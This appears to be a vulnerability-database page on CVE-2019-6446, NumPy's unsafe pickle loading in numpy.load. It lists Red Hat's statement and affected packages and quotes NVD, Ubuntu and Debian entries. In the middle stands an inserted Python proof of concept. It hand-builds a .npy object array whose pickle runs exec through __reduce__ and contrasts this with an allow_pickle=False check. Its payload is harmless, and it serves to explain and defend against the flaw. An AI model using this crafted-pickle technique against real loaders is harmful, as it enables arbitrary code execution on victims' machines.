exploitDog
CVE-2019-6446

Published: 16 Jan 2019
Source: redhat
CVSS3: 8.8

Description

An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.
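To make the description concrete, here is an added example; it is not exploitDog's, Red Hat's or NumPy's own code. It hand-builds a `.npy` v1.0 container whose header declares an object dtype (`'|O'`) and whose data section is a pickle stream carrying a `__reduce__` payload, then contrasts the two load paths. `load_trusting_pickle` mirrors the pre-1.16.3 default of `numpy.load` (`allow_pickle=True`), which hands the data section straight to `pickle.loads`; `load_untrusted` mirrors `numpy.load(f, allow_pickle=False)`, the default since NumPy 1.16.3, and refuses the file from the header alone without touching the data. The marker environment variable, the payload string, the constructed sample files and every function name are assumptions of this example; the payload only sets that variable so that execution is observable and harmless.

```python
"""Crafted .npy object array versus a header-only check, mirroring numpy.load()
with and without allow_pickle. The container is built by hand, so no numpy is
needed to run this (added example, not the project's code)."""
import ast
import os
import pickle
import struct

NPY_MAGIC = b"\x93NUMPY"
# Assumed: the payload only sets an environment variable so its effect is
# observable and harmless; a real attacker would call os.system() or open a socket.
MARKER_ENV = "NPY_PICKLE_DEMO_EXECUTED"
PAYLOAD_SRC = f"import os; os.environ[{MARKER_ENV!r}] = 'yes'"


class Crafted:
    """Any object whose __reduce__ hands the unpickler a callable plus arguments.
    The class itself is never stored in the pickle, only builtins.exec and the string."""

    def __reduce__(self):
        return (exec, (PAYLOAD_SRC,))


def build_npy(descr: str, shape: tuple, data: bytes) -> bytes:
    """Write a .npy v1.0 container: magic, version 1.0, little-endian uint16 header
    length, ASCII dict header space-padded to a 16-byte boundary and ending in a
    newline, then the data section (raw numbers, or a pickle for object dtypes)."""
    header = f"{{'descr': {descr!r}, 'fortran_order': False, 'shape': {shape!r}, }}"
    pad = 16 - ((len(NPY_MAGIC) + 4 + len(header) + 1) % 16)
    header = header + " " * pad + "\n"
    return NPY_MAGIC + b"\x01\x00" + struct.pack("<H", len(header)) + header.encode("latin1") + data


def read_npy_header(blob: bytes):
    """Parse only the header and return (header dict, offset of the data section).
    ast.literal_eval accepts literals only, so the header cannot run code, and the
    data section is never looked at here."""
    if blob[:6] != NPY_MAGIC:
        raise ValueError("not an .npy file")
    major = blob[6]
    if major == 1:
        (hlen,), start = struct.unpack("<H", blob[8:10]), 10
    elif major in (2, 3):
        (hlen,), start = struct.unpack("<I", blob[8:12]), 12
    else:
        raise ValueError(f"unsupported .npy format version {major}")
    raw = blob[start:start + hlen]
    header = ast.literal_eval(raw.decode("utf-8" if major == 3 else "latin1"))
    return header, start + hlen


def descr_needs_pickle(descr) -> bool:
    """True when the dtype holds Python objects ('O'), i.e. the data section is a
    pickle stream. Structured dtypes are lists of (name, descr[, shape]) and may nest."""
    if isinstance(descr, str):
        return descr.lstrip("<>|=").startswith("O")
    return any(descr_needs_pickle(field[1]) for field in descr)


def load_untrusted(blob: bytes) -> dict:
    """Hardened path, equivalent to np.load(f, allow_pickle=False): reject object
    dtypes from the header alone, otherwise hand back the raw numeric bytes."""
    header, offset = read_npy_header(blob)
    if descr_needs_pickle(header["descr"]):
        raise ValueError("object arrays cannot be loaded when allow_pickle=False")
    return {"descr": header["descr"], "shape": header["shape"], "data": blob[offset:]}


def load_trusting_pickle(blob: bytes):
    """Pre-1.16.3 default (allow_pickle=True): an object dtype sends the data section
    straight to pickle.loads, which executes whatever the file's author put there."""
    header, offset = read_npy_header(blob)
    if descr_needs_pickle(header["descr"]):
        return pickle.loads(blob[offset:])
    return blob[offset:]


def crafted_npy() -> bytes:
    """Constructed sample: looks like a one-element object array, carries the payload."""
    return build_npy("|O", (1,), pickle.dumps(Crafted(), protocol=3))


def benign_npy() -> bytes:
    """Constructed sample: three float64 values, no pickle anywhere."""
    return build_npy("<f8", (3,), struct.pack("<3d", 1.0, 2.0, 3.0))


def decode_f8(raw: bytes) -> tuple:
    """Turn a little-endian float64 data section back into Python floats."""
    return struct.unpack(f"<{len(raw) // 8}d", raw)


def payload_executed() -> bool:
    """Did the crafted object's code run in this process?"""
    return os.environ.get(MARKER_ENV) == "yes"


def hardened_rejects(blob: bytes) -> bool:
    """True when the allow_pickle=False path refuses the file and nothing was unpickled."""
    os.environ.pop(MARKER_ENV, None)
    try:
        load_untrusted(blob)
    except ValueError:
        return not payload_executed()
    return False


if __name__ == "__main__":
    print("allow_pickle=False refuses the crafted file:", hardened_rejects(crafted_npy()))
    load_trusting_pickle(crafted_npy())
    print("allow_pickle=True ran the payload:", payload_executed())
    print("benign float64 array still loads:", decode_f8(load_untrusted(benign_npy())["data"]))
```

The practical check in real code is to pass `allow_pickle=False` to `numpy.load` explicitly, even though it has been the default since 1.16.3, so that the call stays safe on the older builds listed below as "Will not fix"; enable pickling only for files whose origin is authenticated, which is exactly the legitimate use the disputing parties describe.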

Statement

Red Hat Enterprise Virtualization Management Appliance includes the vulnerable version of numpy, however it is not used and this vulnerability is not exposed. Red Hat OpenStack Platform includes a vulnerable version of numpy, however it is not used in a vulnerable manner.

Affected packages

Platform                                Package             State         Advisory        Release
Red Hat Ceph Storage 4                  numpy               Affected
Red Hat Enterprise Linux 6              numpy               Will not fix
Red Hat Enterprise Linux 7              numpy               Will not fix
Red Hat OpenStack Platform 13 (Queens)  numpy               Will not fix
Red Hat OpenStack Platform 14 (Rocky)   numpy               Will not fix
Red Hat Software Collections            python27-numpy      Will not fix
Red Hat Software Collections            rh-python35-numpy   Will not fix
Red Hat Software Collections            rh-python36-numpy   Will not fix
Red Hat Virtualization 4                rhvm-appliance      Will not fix
Red Hat Enterprise Linux 8              python27            Fixed         RHSA-2019:3335  2019-11-05


Additional information

Severity (Red Hat impact rating): Moderate
Weakness: CWE-358 -> CWE-20
Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1667950
  numpy: crafted serialized object passed in numpy.load() in pickle python module allows arbitrary code execution
CVSS3 (Red Hat): 8.8 High

Related vulnerabilities

ubuntu, CVSS3: 9.8, more than 6 years ago
** DISPUTED ** An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

nvd, CVSS3: 9.8, more than 6 years ago
An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

debian, CVSS3: 9.8, more than 6 years ago
An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickl ...

suse-cvrf, more than 5 years ago
Security update for python-numpy

suse-cvrf, more than 5 years ago
Security update for python-numpy
